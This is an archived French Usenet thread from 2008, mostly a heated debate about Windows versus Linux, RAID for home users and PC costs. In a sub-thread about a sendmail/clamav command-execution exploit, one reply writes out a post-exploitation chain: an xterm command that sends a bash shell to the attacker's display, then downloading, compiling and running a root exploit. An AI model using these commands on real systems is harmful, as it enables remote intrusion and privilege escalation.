OVH Cloud OVH Cloud

La police francaise passe sous Linux

430 réponses
Avatar
Branlebât
Gageons déjà que la productivité est très faible avec Windows, au vu de
l'imcompétence des piou-piou, ils vont pas être dans la merde avec
Linux

Ca va être un plaisir de les foir faire des FSCK pour rétablir (peut
être) le système de fichiers, ou encore pester contre les documents
imcompatibles entre OpenOffice et Office

Gageons que ces "immenses" économies vont couter plus de 100 fois les
simples système Windows

lol

10 réponses

Avatar
JKB
Le 13-02-2008, à propos de
Re: La police francaise passe sous Linux,
Kevin Denis écrivait dans fr.comp.os.linux.debats :
On 2008-02-13, JKB wrote:
Je vais de donner un scoop. Avec un sendmail des familles configuré
_normalement_, tu lui rajoutes un milter-greylist, un greeting_delay
(dans la conf de sendmail), un mimedefang avec clamav et sa, soit
trois ou
quatre lignes de plus dans le /etc/mail/sendmail.mc et tu as un truc
qui commence à bien résister aux spams.


<SNIP l'attaque>


Je raconte une connerie ou ce truc nécessite un sendmail _et_ un
clamav en root ? Voire un clamav seul en root ?

Je n'ai pas materiellement de quoi tester. Mais si tu remplaces les echo

etc par un id > /tmp/trace tu auras vite l'info.


De toute façon, chez moi, ni sendmail, ni clamav ne tournent en root
(et un greylist fait le reste).

Au vu de ce que je lis dans l'exploit (execution arbitraire de commande),

je ne vois pas en quoi etre root ou pas modifie quelque chose.
J'ai peut etre raté un truc, remarque, j'ai pas creusé.


Je n'ai pas vérifié, mais j'ai l'impression comme ça que l'exploit
permet de se retrouver avec les droits de l'utilisateur clamav (je
n'ai pas testé, donc je peux raconter des c*nneries).

JKB

--
Le cerveau, c'est un véritable scandale écologique. Il représente 2% de notre
masse corporelle, mais disperse à lui seul 25% de l'énergie que nous
consommons tous les jours.






Avatar
Thierry B.
--{ JKB a plopé ceci: }--


JKB, qui hait toujours autant Solaris...

Tu as lu le roman ? Tu as vu _le_ film ?



--
| R : Tu vois !
| | Q : Tu crois ?
| | | R : Ça casse l'ordre chronologique de l'échange.
| | | | Q : En quoi répondre au dessus est-il gênant ?

Avatar
Michel Campfort

C'est complètement marginal ces histoirs de pertes de données ou de
spam. J'ai demandé ce matin à mon père s'il avait jamais perdu le
moindre rapports puisqu'il en a fait, avec équations saisies dans
Word, depuis le milieu des années 80, et bien ça n'a jamais été le
cas.
Heureux homme. C'est l'arbre qui cache la forêt.

C'est toi qui le dit. Je n'ai que des exemples comme ça. Le seul cas de

perte de données avec Word que je connaisse c'est quand un laboratoire
qui rédigeait un dictionnaire (le TLF) a voulu relire 10 ans plus tard
un carton entier de disquettes écrite plusieurs années avant sur
d'autres ordinateurs (des mac). C'était illisible ; ils ont retrouvé
une vieille machine pour convertir et basta. 10 ans, poru l'informatique
domestique, c'est au-delà du temps pris en charge. Les supports de
stockages accessibles aux particuliers ne garantissent même pas cette
distance.


Autre annecdote, mais il faut d'abord s'asseoir : on m'a raconté le cas
d'un administrateur, dans un labo public, qui vérifiait régulièrement
les dates de dernier accès aux fichiers de ses utilisateurs, et qui au
delà d'un seuil supprimait les fichiers sans aucun préavis... paraît
qu'en 10 ans de ce régime personne ne s'est rendu compte de rien...
c'était il y a dix ou quinze ans, cela dit, sur un serveur.


Je résume:

- Ton père et son pool de secrétaires
- Labo où l'on rédigeait un dictionnaire
- Admin sur un serveur

C'est bien dans ce fil que tu nous rabache ton "informatique domestique"
et les solutions "grand publique" sans apprentissage?

Tu t'égares, tu perds le fil de tes idées.

--
Amicalement

Michel




Avatar
Nicolas George
Sylvain , dans le message <47b0e453$0$874$, a
écrit :
c'est un peu édifiant de suffisance tout cela !


C'est SL, il est toujours comme ça, il ne comprend rien à rien, n'est pas
capable de suivre un raisonnement logique un tant soit peu évolué, vit dans
un monde où le grand public a besoin de logiciels de statistiques, et où les
outils qui simplifient le travail font perdre du temps, et noie les gens
sous un flot de verbiage sans queue ni tête pour le plaisir de se lire
lui-même.

Discuter avec lui ne sert à rien.

Avatar
SL
Le 13-02-2008, JKB a écrit :

Et c'est très con, d'autant plus qu'on ne peut pas dissocier les
logiciels de l'OS à cause de cette fichue base de registre. Et
je ne parle pas des données qui sont sur le disque système par
défaut. Bref, une simplicité pareille, ce n'est que du bonheur.


Dissocier quoi de quoi ??? Trop technique.


Windows = OS + données de l'utilisateur + logiciels + base de
registre, tout ça généralement sur la même partition (en tout cas
pour OS + base de registre + certaines données de l'utilisateur). Ce
qui fait qu'une réinstallation casse tout.

Toi y en a comprendre ?


Je voulais dire que c'était incompréhensible poru qui n'est pas payé
pour.

Sauf que (et je ne sais pas comment te le dire tellement tu es
bouché) LE CD N'A JAMAIS INDIQUÉ QU'IL ALLAIT TOUT FORMATER ET
CASSER TOUTES LES PARTITIONS. Le minimum serait au moins d'en
avertir l'utilisateur. Mieux, une option "tout restaurer" une
autre "restaurer l'OS".


Oui, des "options radicales", ça visait quoi, à ton avis ? Toujours
est-il que ce sont comme toujours des annecdotes. D'ailleurs dans mon
expériences personnelles j'ai au contraire été mis en garde contre la
perte de données. Tout ceci est perpétuellement annecdotique et tu
loupes complètement l'essentiel.

Je te trouve un PC de base chez Surcouf à moins de 300 euros, PC
qui est _laaaargement_ assez péchu pour faire de la bureautique,
alors que si tu veux une machine pour jouer, il te faut du haut
de gamme. Or jusqu'à présent : PC bas de gamme + console de
jeux < PC haut de gamme.


Je suis pas sûr du tout de tout ça. Le gamer n'a pas envie d'avoir
une casserole à côté pou rle reste. Bref comme toujours ces
raisonnements sur les utilisateurs me semblent complètement gratuit
et sans rapport avec le fonctionnement réel des utilisateurs.


Je n'ai pas l'impression qu'un Celeron 2,4 GHz avec 1 Go de
mémoire soit une casserole lorqu'on n'a plus que du traitement
de texte à faire.


Je n'ai pas l'impression que les personnes concernées sont toutes de ton
avis.

Il ne le souhaite de toute évidence pas.


Qu'en sais-tu ? L'utilisateur ne s'en préoccupe pas jusqu'au
jour où "ça plante" et qu'il perd les photos de ses dernières
vacances et là, crois-moi, il se renseigne un peu.


Oui, et après s'être renseigné, il change de système d'exploitation
et administre du raid, c'est bien connu.


Tu es décidément irrécupérable. Je te compare un système
_installé_ (Windows) à un autre système _installé_ et j'en
conclus qu'à partir du moment où c'est _installé_, l'utilisateur
arrive à se démerder dans le cas d'un raid1 sans taper des
commandes absconses.


Ton truc est irréaliste, je ne peux pas te l'expliquer puisque le réel
n'a aucun importance pour toi.

Je me répète ou tu essayes de comprendre ? Le béotien s'en
contrefout _jusqu'à son premier crash avec perte de données_.


Oui, mais après il ne change rien de son comportement qui justifie to
nraisonnement. Parce qu'après, si jamais il change quelques chose (ce
que personnellmeent je n'observe pas si souvent), c'est l'achat d'un
disque externe usb, qui coûte quelques dizaines d'euros, et qui règle
le pb. Pas d'aller administrer du RAID. Absolument jamais. Tous tes
raisonnements sont comme ça.


Si tu le dis... L'utilisateur final, il se rend compte d'une
chose : la durée de vie de son disque USB est plus faible que
celle de sa machine de bureau. Je ne parlerais même pas des CD
et DVD gravés. Bref, mais comme de toute façon ton opinion est
forcément la meilleure à quoi sert de discuter.


Mais bien sûr... il s'en rend tellement compte que tout le monde fait
comme ça et en est satisfait ; c'est sans doute qu'ils ignorent le
point de vue de JKB sans doute.

Le matériel que je connais fait cela aussi, seulement ce sont trois
baies qui ont dû nous coûter 2000 EE pièce, je suis pas sûr que le
hot plug soit sans coût. (dans nos trucs y'a même pas besoin de
tournevis d'ailleurs). Mais si tu ne vois pas toute la technicité que
cela implique, tant pis.


Dans un PC de base, tu peux très bien faire avec deux tiroirs
SATA sans hotplug. Cela ne coûte quasiment rien. Maintenant,
trouver une baie à 2000 euros pièce (même HT), c'est risible et
on voit que tu ne t'es jamais penché sérieusement sur le
problème. Tu multiplie au moins par 2,5 pour une baie _vide_ et
tu rajoute les disques. De toute façon, ce n'est pas cela que
je parlais. Je n'ai jamais parlé de baie mais de raid1 que tu
peux faire en soft à très peu de frais.


Excuse moi de ne pas jouer au concours de bite avec toi.

pas d'une alternative concrète. Il est clair que les disques sont un
des points faibles ; il y a des solutions qui permettent de s'en
débarasser.


Exemple ? Et ne me parle pas de mémoire flash parce que dans ce
cas, on pourrait dire que tu n'as rien compris.


Il y a des modèles de Mac et de PC avec des petits disques, je n'irais
pas les chercher parce que ça te regarde ; il y a différentes
expériences (par exemple de google) pour offrir des lieux de stockages
en ligne de documents ; les sites communautaires (pour les photos, pour
les liens), relèvent de la même logique. Tout ça pour dire que prétendre
que le raid est une bonne solution pour le particulier, quand il prend
le chemin exactement inverse, n'a tout simpelment aucun sens, mais on
peux te pallucher indéfiniement à coup d'hypothèses gratuites, faire
virer le débat à des guerres sur des points de détail, etc.

Je le lui dirait la prochaine fois que je le vois qu'il s'est
complètement trompé dans son appréciation du travail des secrétaires
; il sera ravis de l'apprendre.


Décidément, tu es encore plus bête que je ne le pensais.
Je n'ai _jamais_ dit que le travail des secrétaires était
parfait, simplement qu'elles savaient écrire


Dans le cas en question, ce n'est pas tout à fait le cas.

et que comparé au travail actuel d'un ingénieur (lorsqu'il se
targue d'être une secrétaire), le travail des secrétaires était
d'une qualité remarquable. Ça va mieux comme ça.


Non. C'est encore une généralité débile, et ça n'exprime rien d'autre
que ton besoin d'être soigneusement distingué d'un "ingénieur".




Avatar
Michel Campfort

faire cuire un oeuf. Clairement les revues informatiques rendent un très
mauvais service en privilégiant constamment les performances et des
benchmarks débiles alors que l'intérêt réel de l'utilisateur est exactement
à l'opposé.


En même temps je ne suis pas sûr qu'elle diffère beaucoup sur ce oitn
des revues pour n'importe quel produit de consomation ; et que le
consomateur qui le souhaite n'ait pas les moyens de comprendre où sont
les choses dimensionnsées à des besoins simples et offrant le maximum de
garanties de sérieux.


Ah merde! Là, il va falloir que ton utilsateur grand public qui n'en a
rien à foutre de la technique il fasse un petit effort!

--
Amicalement

Michel


Avatar
Matthieu Clavier
On 2008-02-13, Kevin Denis wrote:
Au vu de ce que je lis dans l'exploit (execution arbitraire de commande),
je ne vois pas en quoi etre root ou pas modifie quelque chose.
J'ai peut etre raté un truc, remarque, j'ai pas creusé.


echo machintruc > /etc/inetd.conf
-bash: /etc/inetd.conf: Permission non accordée

--
Matthieu Clavier

Avatar
Sylvain
SL wrote on 13/02/2008 15:26:

Des systèmes moins faciles ? Tu te rends compte de ce que tu dis
? Si tu prends un Windows XP de base (pas assez de recul pour
juger Vista, mais pour l'instant l'expérience n'est pas pour moi
concluante), pour peu que tu installes et désintalle
régulièrement des programmes, tu arrives très vite au point de
saturation où tu n'as plus qu'une solution rapide : réinstaller,
parce que le nettoyage va te prendre des heures !



"saturation" de quoi ?
"nettoyer" quoi ?

J'ai installé et testé des trucs sans arrêté pendant des années sur une
installation XP et je n'ai jamais rencontré ce problème. Comme beaucopu
de choses, pour moi, ça relève de la légende.


en partie ... avec un fond de vérité.

Mettre un raid d'office est inimaginable
L'utilisateur final n'est pas bête et est capable de comprendre

que dans la majorité des cas, il vaut mieux un disque doublé
qu'un processeur double corps tournant à des vitesses inutiles
pour lui.


Raisonner en terme de sauvergarde, etc., c'est trop technique, désolé.
Du point de vue d'un béotion, copier un disque sur l'autre, c'est un
gachis pur et simple.


si l'utilisateur ne se soucie pas des détails techniques, il n'a pas
besoin de savoir qu'un RAID1 existe, ni que cela constite en un
miroitage (sur 2 ou plus disques).
un système user-friendly pourrait avoir 2 disks RAID1 et inviter
l'utilisateur à contacter son SAV lorsqu'un disk a un pb (tout en
continuant à fonctionner normalement hors synchronisation).

reste que la perte de données par défaillance matérielle est surement -
dans le grand public - très faible par rapport aux pertes par mauvaise
manipulation ou par virus (et similaires).

un RAID1 qui ne donne "que" une espérance de vie de 50% en plus ne fera
pas beaucoup de différences pour le confort de l'utilisateur.

parce que ça ne sert à rien d'avoir deux disques en raid si tu ne sais
pas en profiter pour le reconstruire en cas de crash d'un des disques.
Et ça c'est une tâche d'administration.


non pas d'admin, seulement de technicien voire de vendeur pour installer
un nouveau disque - le controleur RAID resynchronisera les données tout
seul - à un dialog de notification prêt.

Le mouvement est
purement à la disparition pure et simple des disques durs et du stockage
local, de toute façon...


on dit ça depuis +5 ans, je n'ai rien vu de concrêt à ce jour.
et les seuls à utiliser des terminaux restent les entreprises.

Écoute je raporte ce qu'il me dit, mais tu sais peut être mieux que lui
ce qu'il a vu. Je te dis qu'en l'occurrence elles faisaient des erreurs
et qu'il fallait reprendre n fois le travail, sans parler des équations.


des erreurs de transcription (parce qu'elles ne comprenaient pas les
équations saisies) plus que des erreurs d'utilisation du logiciel.

l'exemple n'illustre pas ton argument; si une info grand public sans
formation avait été disponible, les secrétaires comme l'auteur auraient
pu saisir le document; si elle n'existait pas personne aurait pu le
faire ... sauf à ne pas écarter l'expérience de l'utilisateur et
sûrement ton père (en bon matheux) intuitait et comprenanait mieux
qu'une secrétaire lamdba.

dire que l'info est spontanément accessible aux personnes "à forte
culture" est sûrement vrai; le généraliser à tout utilisateur beaucoup
moins.

son premier éditeur
était "chiwriter", qui avait notamment un éditeur d'équations. j'en ai
trouvé aucune trace sur le net ; si quelqu'un se souvient de ça...


éditeur mathématique publié entre 1986 et 1990. google le connait.

Sylvain.



Avatar
Sylvain
SL wrote on 13/02/2008 16:54:

Dans ce cas, pour jouer, tu prends une console de jeux.
Oui, quand tu as l'argent.

Je te trouve un PC de base chez Surcouf à moins de 300 euros, PC

qui est _laaaargement_ assez péchu pour faire de la bureautique,
alors que si tu veux une machine pour jouer, il te faut du haut
de gamme. Or jusqu'à présent : PC bas de gamme + console de
jeux < PC haut de gamme.


Je suis pas sûr du tout de tout ça. Le gamer n'a pas envie d'avoir une
casserole à côté pou rle reste. Bref comme toujours ces raisonnements
sur les utilisateurs me semblent complètement gratuit et sans rapport avec
le fonctionnement réel des utilisateurs.


quelle casserole ?
un PC bureautique très confortable coute 400 euros (à parir de 300).
un PC gamer 1500 ! compte déjà 500 euros pour 2 cartes video.

le gamer aura tout intérêt _factuel_ à utiliser 2 machines;
par contre pour se la péter à la récré, un PC à 3kW fait mieux.

la question du cout ne me semble pas vraiment un critère fort, le
"fonctionnement des utilisateurs" est ici l'histoire qu'il s'invente (et
libre à eux).

Sylvain.




Avatar
Kevin Denis
On 2008-02-13, Matthieu Clavier wrote:
je ne vois pas en quoi etre root ou pas modifie quelque chose.
J'ai peut etre raté un truc, remarque, j'ai pas creusé.


echo machintruc > /etc/inetd.conf
-bash: /etc/inetd.conf: Permission non accordée

Tu manques d'imagination. Au hasard, hein, tu peux essayer:

xterm -display chezmoi:0 /bin/bash

Oh, un xterm s'affiche chez moi. Mais qu'est ce que je pourrais bien
taper comme truc dedans?
wget exploit-vmslice.c
gcc -o got_root exploit-vmslice.c
./got_root
--
Kevin